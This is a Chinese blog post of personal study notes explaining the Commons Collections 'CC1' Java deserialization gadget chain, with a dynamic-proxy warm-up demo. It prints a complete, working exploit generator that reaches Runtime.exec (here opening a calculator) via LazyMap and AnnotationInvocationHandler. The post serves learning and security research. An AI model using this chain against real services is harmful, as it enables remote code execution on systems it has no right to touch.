[JAVA反序列化]Javacc链1分析

最新推荐文章于 2024-01-23 18:23:13 发布
最新推荐文章于 2024-01-23 18:23:13 发布
阅读量1.9k 收藏 3
点赞数 4
分类专栏: 安全学习 # Java代码审计 # Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/117448761
版权
安全学习 同时被 3 个专栏收录
210 篇文章 81 订阅
订阅专栏
Web
94 篇文章 21 订阅
订阅专栏
Java代码审计
38 篇文章 16 订阅
订阅专栏

文章目录

写在前面

这几天算是好好一边审计PHP的一些CMS一边啃Java的代码,终于能看懂CC链1的构造流程了

动态代理

简单介绍

在JavaCC链1的构造中,动态代理起了很关键的作用,这里来进行简单介绍,Java标准库提供了动态代理的机制,其可以在运行期动态创建interface的实例,直接从demo来理解
首先我们来个通常写代码的方式
我们先来一个一个接口,本CTF狗来个Flag吧

interface flag {
    void getFlag();
}

接下来实现这个接口

class giveFlag implements flag {
    public void getFlag() {
        System.out.println("Give you flag:flag{y4tacker}");
    }
}

来测试一波,完整组合

import java.lang.String;
public class demo1 {

    public static void main(String[] args) throws Exception {
        GiveFlag giveFlag = new GiveFlag();
        giveFlag.getFlag();
    }
}


interface flag {
    void getFlag();
}

class GiveFlag implements flag {
    public void getFlag() {
        System.out.println("Give you flag:flag{y4tacker}");
    }
}

动态代理的实现

我们通过动态代理来做一个劫持玩玩,不玩最简单的

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.String;
import java.lang.reflect.Proxy;

public class demo1 {

    public static void main(String[] args) throws Exception {
        InvocationHandler handler = new InvocationHandler() {
            @Override
            public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
                if (method.getName().equals("getFlag")) {
                    System.out.println("就这?");
                }
                return null;
            }
        };
        flag getFlag = (flag) Proxy.newProxyInstance(
                GiveFlag.class.getClassLoader(), 
                new Class[] { flag.class }, 
                handler); 
        getFlag.getFlag();
    }
}


interface flag {
    void getFlag();
}

class GiveFlag implements flag {
    public void getFlag() {
        System.out.println("Give you flag:flag{y4tacker}");
    }
}

最后输出了就这?

JavaCC链1分析

这个链子的流程是(来自ysoserial)

/*
	Gadget chain:
		ObjectInputStream.readObject()
			AnnotationInvocationHandler.readObject()
				Map(Proxy).entrySet()
					AnnotationInvocationHandler.invoke()
						LazyMap.get()
							ChainedTransformer.transform()
								ConstantTransformer.transform()
								InvokerTransformer.transform()
									Method.invoke()
										Class.getMethod()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.getRuntime()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.exec()
 */

首先给出这个链子的实现,来自P神大师傅!!!

Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] {
                String.class, Class[].class }, new Object[] {
                "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] {
                Object.class, Object[].class }, new Object[] {
                null, new Object[0] }),
            new InvokerTransformer("exec",
                new Class[] { String.class }, new String[]{"open /Applications/Calculator.app"}),
         };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap,transformerChain);
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},handler);
        handler  = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(handler);
        oos.close();
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();

首先触发点和之前很像,我们知道是通过对decorate修饰后的在添加新的元素的时候,可以执行一个回调;
Lazymap在其get方法当中执行factory.transform,在get找不到值的时候,会调用factory.transform去获取一个值

public Object get(Object key) {
        if (!super.map.containsKey(key)) {
            Object value = this.factory.transform(key);
            super.map.put(key, value);
            return value;
        } else {
            return super.map.get(key);
        }
    }

为了能调用这个方法,我们走AnnotationInvocationHandler中的invoke方法,在default分支

public Object invoke(Object var1, Method var2, Object[] var3) {
        String var4 = var2.getName();
        Class[] var5 = var2.getParameterTypes();
        if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
            return this.equalsImpl(var3[0]);
        } else if (var5.length != 0) {
            throw new AssertionError("Too many parameters for an annotation method");
        } else {
            byte var7 = -1;
            switch(var4.hashCode()) {
            case -1776922004:
                if (var4.equals("toString")) {
                    var7 = 0;
                }
                break;
            case 147696667:
                if (var4.equals("hashCode")) {
                    var7 = 1;
                }
                break;
            case 1444986633:
                if (var4.equals("annotationType")) {
                    var7 = 2;
                }
            }

            switch(var7) {
            case 0:
                return this.toStringImpl();
            case 1:
                return this.hashCodeImpl();
            case 2:
                return this.type;
            default:
                Object var6 = this.memberValues.get(var4);
                if (var6 == null) {
                    throw new IncompleteAnnotationException(this.type, var4);
                } else if (var6 instanceof ExceptionProxy) {
                    throw ((ExceptionProxy)var6).generateException();
                } else {
                    if (var6.getClass().isArray() && Array.getLength(var6) != 0) {
                        var6 = this.cloneArray(var6);
                    }

                    return var6;
                }
            }
        }
    }

能看到上面Object var6 = this.memberValues.get(var4);,因此要劫持内部调用就需要使用java.reflect.proxy,上面已经说过了,如果我们把AnnotationInvocationHandler做代理,那么在readObject时,只要调用任意方法,就会进入AnnotationInvocationHandlerinvoke方法,之后触发lazymapget方法,而这个AnnotationInvocationHandler实现了InvocationHandler,因此我们就更可以放心大胆的飞了!!

Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},handler);

在这以后对象里面的memberValues就成功变成了我们的LazyMap
之前上一篇文章也说过,我们将transformers传入ChainedTransformer就实现了参数的传递(ChainedTransformer是实现了Transformer接⼝的⼀个类,它的作⽤是前⼀个回调返回的结果,作为后⼀个回调的参数传⼊
),之后用LazyMap的decorate包装,在触发lazymap的get方法后执行整个“回调”过程,整个链子的思路就很清晰啦!
然而我们最终的proxyMap也并不能直接对其序列化,毕竟他也没有readobject不能操作了,因此我再用sun.reflect.annotation.AnnotationInvocationHandler对其进行包装一波,完美实现!!!庆祝🎉太难了好几天了终于琢磨透了

参考文章

https://www.cnblogs.com/whirly/p/10154887.html
https://www.cnblogs.com/staticking/p/13628307.html
https://www.cnblogs.com/yyhuni/p/14797752.html
https://www.cnblogs.com/afanti/p/10200291.html
https://blog.csdn.net/god_zzz/article/details/108259940
https://www.cnblogs.com/nice0e3/p/13779857.html

Y4tacker
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
编译原理实验二语法分析java代码JavaCC
06-28
设计MiniC的上下文无关文法,利用JavaCC生成调试递归下降分析程序,以便对任意输入的符号串进行分析。本次实验的目的主要是加深对递归下降分析法的理解。 按照MiniC语言的语法规则检查词法分析输出的记号流是否符合这些规则,并根据这些规则所体现出的语言中的各种语法结构的层次性。把规则写入到JavaCC的 .jjt文件中,可以生成树状的层次结构。
Java反序列化CC解析
defeed的博客
05-11 1106
一篇学习介绍javacc的文章,对cc的transform和简单的利用做了一些介绍
【心得】javaCC1入门CC个人笔记
最新发布
uuzeray的博客
01-23 1495
来劲了,感觉离真正的CTF又近了一步。本文仅从一个萌新的角度去谈,如有纰漏,纯属蒟蒻。
Java安全研究——反序列化漏洞之CC2
weixin_43889136的博客
05-10 1326
0x01
java反序列化cc
wanan的博客
01-24 349
java反序列化cc
java反序列化 cc6 分析
m0_64815693的博客
04-22 998
java反序列化 cc6 分析
Java反序列化CC分析
阿道夫的博客
02-06 534
Apache Commons是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。Commons Collections包为Java标准的CollectionsAPI提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
javacc语法分析.zip
01-16
javacc语法分析
javacc语义分析.zip
01-16
javacc语法分析
minijava-parser:使用JavaCC解析器迷你Java
05-02
MiniJava解析器使用指南安装javacc sudo apt-get -y install javacc 添加执行权限sudo chmod +x run 执行./run input/Fatorial.java./run input/BinarySearch.java
Java写的cmm词法分析器(源代码)及javacc学习心得文档
11-07
包里包括了Java写的cmm 词法分析器,以及一篇javacc的学习心得,对编译原理实践课有用! 包里包括了Java写的cmm 词法分析器,以及一篇javacc的学习心得,对编译原理实践课有用!
Compiler Construction Using Java JavaCC and Yacc 无水印pdf
09-30
Compiler Construction Using Java JavaCC and Yacc 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如...
重庆理工大学编译原理课程设计 java javacc 类C编译器
06-29
1.利用离散数学和形式语言的基本知识,对给定的简单语言设计其上下文无关文法和属性文法,对该语言的编译器进行分析,确定所设计的编译器的功能和应用环境,设计可行的设计方案。 2.选择合适的开发工具实现编译器的...
基于Minic的语法分析器(javacc)
12-30
基于Minic的语法分析器,javacc书写,实现了文件的读取和写入操作加压后可直接导入运行
javacc实现cmm语法分析
12-11
使用javacc自动生成cmm语法分析器,使用jjt文件生成语法树,支持错误处理。
javacc 词法分析解释器例子
10-16
cmm javacc 对CMM语言的词法语法分析器的自动实现
《实习一:词法分析(javacc)》内有源码
05-06
1. 熟悉 Javacc 工作原理,掌握词法分析相关的类: Token:表示单词的类。每个 Token 对象的主要成员:int kind 表示单词的 种别; String image 存储了 token 所代表的内容;int beginLine 表示单词所处 的行;int ...
javacc 词法分析
05-31
对一句话的关键词进行分析,挑出关键词的一种工具
编译原理中用javacc实现MiniC的词法分析、语法分析、语义分析
02-23
在语法分析部分利用Javacc实现LL(1)文法,判断源语言是否符合MiniC的语法,如果不符合,给出语法错误信息;语义分析部分是在语法分析的基础上根据属性文法制导翻译,进行语义分析,输出四元式。
java语法分析器_JavaCC语法分析
06-10
JavaCC是一种基于Java语言开发的语法分析器生成器,可以用来生成Java语言编写的语法分析器。它可以根据用户定义的语法规则,生成一个自动机,并根据自动机构建出一个语法分析器。JavaCC支持自定义的语法规则,可以处理LL(k)文法、LALR(k)文法和正则文法,并且支持语法分析错误的恢复和处理。JavaCC还提供了许多高级的编程语言特性,例如嵌入式代码、语法扩展、异常处理等,可以让用户更加方便地生成自己所需的语法分析器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值